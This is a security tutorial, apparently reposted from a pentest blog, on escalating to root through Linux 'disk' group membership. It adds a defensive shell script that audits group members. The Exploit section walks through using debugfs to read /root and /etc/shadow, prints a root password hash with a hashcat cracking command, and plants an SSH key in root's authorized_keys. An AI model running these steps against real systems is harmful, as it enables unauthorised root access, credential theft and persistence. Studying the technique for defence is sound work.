Disk group privilege escalation

Original: https://vk9-sec.com/disk-group-privilege-escalation/

The disk group grants its members full access to every block device under /dev/. Since /dev/sda is normally the disk holding the root filesystem, and the disk group has full read and write permission on that device, membership can be used to read or write the contents of any file on it.

Identify

  1. Run the id command

$ id
uid=1000(dora) gid=1000(dora) groups=1000(dora),6(disk)
  2. List the owner and group owner of the devices under /dev and look for partitions whose group is disk

$ ls -l /dev
drwxr-xr-x 7 root root 140 Aug 3 2024 disk
brw-rw---- 1 root disk 253, 0 Aug 3 2024 dm-0
brw-rw---- 1 root disk 8, 0 Aug 3 2024 sda
brw-rw---- 1 root disk 8, 1 Aug 3 2024 sda1
brw-rw---- 1 root disk 8, 2 Aug 3 2024 sda2
brw-rw---- 1 root disk 8, 3 Aug 3 2024 sda3
...

$ find /dev -group disk
/dev/btrfs-control
/dev/dm-0
/dev/sda3
/dev/sda2
/dev/sda1
/dev/sda
/dev/sg1
/dev/loop7
/dev/loop6
/dev/loop5
/dev/loop4
/dev/loop3
/dev/loop2
/dev/loop1
/dev/loop0
/dev/loop-control
  3. List all partitions and where they are mounted

$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 947M 0 947M 0% /dev
tmpfs 199M 1.2M 198M 1% /run
/dev/dm-0 9.8G 5.1G 4.2G 55% /
tmpfs 992M 0 992M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 992M 0 992M 0% /sys/fs/cgroup
/dev/loop0 62M 62M 0 100% /snap/core20/1611
/dev/loop2 50M 50M 0 100% /snap/snapd/18596
/dev/loop1 64M 64M 0 100% /snap/core20/1852
/dev/loop3 92M 92M 0 100% /snap/lxd/24061
/dev/loop4 68M 68M 0 100% /snap/lxd/22753
/dev/sda2 1.7G 209M 1.4G 13% /boot
tmpfs 199M 0 199M 0% /run/user/1000
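To audit a host for this exposure from the defender's side, here is an added shell helper (my own code, not from the original post or from vk9-sec): it lists the disk group's supplementary members, any account whose primary GID is disk's (which the /etc/group member list never shows), and the block devices group-owned by disk. The /etc/group, /etc/passwd and ls -l /dev samples are constructed inline to mirror the listings above, and the function names are my own.

```sh
#!/bin/sh
# Constructed sample /etc/group and /etc/passwd content (not from a real host)
SAMPLE_GROUP='root:x:0:
disk:x:6:dora,backup
sudo:x:27:alice
dora:x:1000:'

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
dora:x:1000:1000::/home/dora:/bin/bash
svc:x:1001:6::/var/lib/svc:/usr/sbin/nologin'

# Constructed excerpt of `ls -l /dev` output; sg1 is a char device, loop0 is group root
SAMPLE_LS='drwxr-xr-x 7 root root 140 Aug 3 2024 disk
brw-rw---- 1 root disk 253, 0 Aug 3 2024 dm-0
brw-rw---- 1 root disk 8, 0 Aug 3 2024 sda
crw-rw---- 1 root disk 21, 1 Aug 3 2024 sg1
brw-rw---- 1 root root 7, 0 Aug 3 2024 loop0'

# Supplementary members of the disk group (field 4 of its /etc/group line), one per line
disk_group_members() {
  awk -F: '$1 == "disk" { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] != "") print m[i] }'
}

# Accounts whose primary GID (field 4 of /etc/passwd) equals the given GID, e.g. 6 for disk
disk_primary_gid_users() {
  awk -F: -v g="$1" '$4 == g { print $1 }'
}

# Block devices (type "b" in the mode string) whose group owner is disk: what membership exposes
disk_group_block_devices() {
  awk '$1 ~ /^b/ && $4 == "disk" { print $NF }'
}

# Join stdin lines with commas onto one line
join_csv() {
  awk 'NR > 1 { printf "," } { printf "%s", $0 } END { print "" }'
}

# Three-line report: members, primary-GID accounts, exposed block devices
disk_group_report() {
  printf 'members: %s\n' "$(printf '%s\n' "$1" | disk_group_members | join_csv)"
  printf 'primary: %s\n' "$(printf '%s\n' "$2" | disk_primary_gid_users 6 | join_csv)"
  printf 'devices: %s\n' "$(printf '%s\n' "$3" | disk_group_block_devices | join_csv)"
}

# Run on the constructed samples; on a live host feed /etc/group, /etc/passwd and `ls -l /dev` instead
disk_group_report "$SAMPLE_GROUP" "$SAMPLE_PASSWD" "$SAMPLE_LS"
```

Any non-root name in the first two report lines is an account that can reach the devices in the third line, which is the condition the Identify steps above look for.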

Exploit

Once the user is confirmed to be in the disk group, we can use debugfs to enumerate the whole disk and obtain root-level access. Because we also have full read and write access to the disk's block device file, we can write arbitrary files as well; in other words, with the disk group we are effectively root, just by a roundabout route.

$ debugfs /dev/dm-0
debugfs 1.45.5 (07-Jan-2020)
debugfs: ls
debugfs: cd /root
debugfs: cat proof.txt
492fe994bfe90fd82258b4d6d1118374
debugfs: cat .profile
# ~/.profile: executed by Bourne-compatible login shells.

if [ "$BASH" ]; then
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
fi
  1. Write authorized_keys, write /etc/passwd, ...

debugfs:  cp id_rsa.pub /root/.ssh/authorized_keys
  2. Read root's public and private keys, read /etc/shadow and crack the root password with hashcat, ...

debugfs:  cat /etc/shadow
root:$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.:19453:0:99999:7:::

hashcat -m 1800 root.hash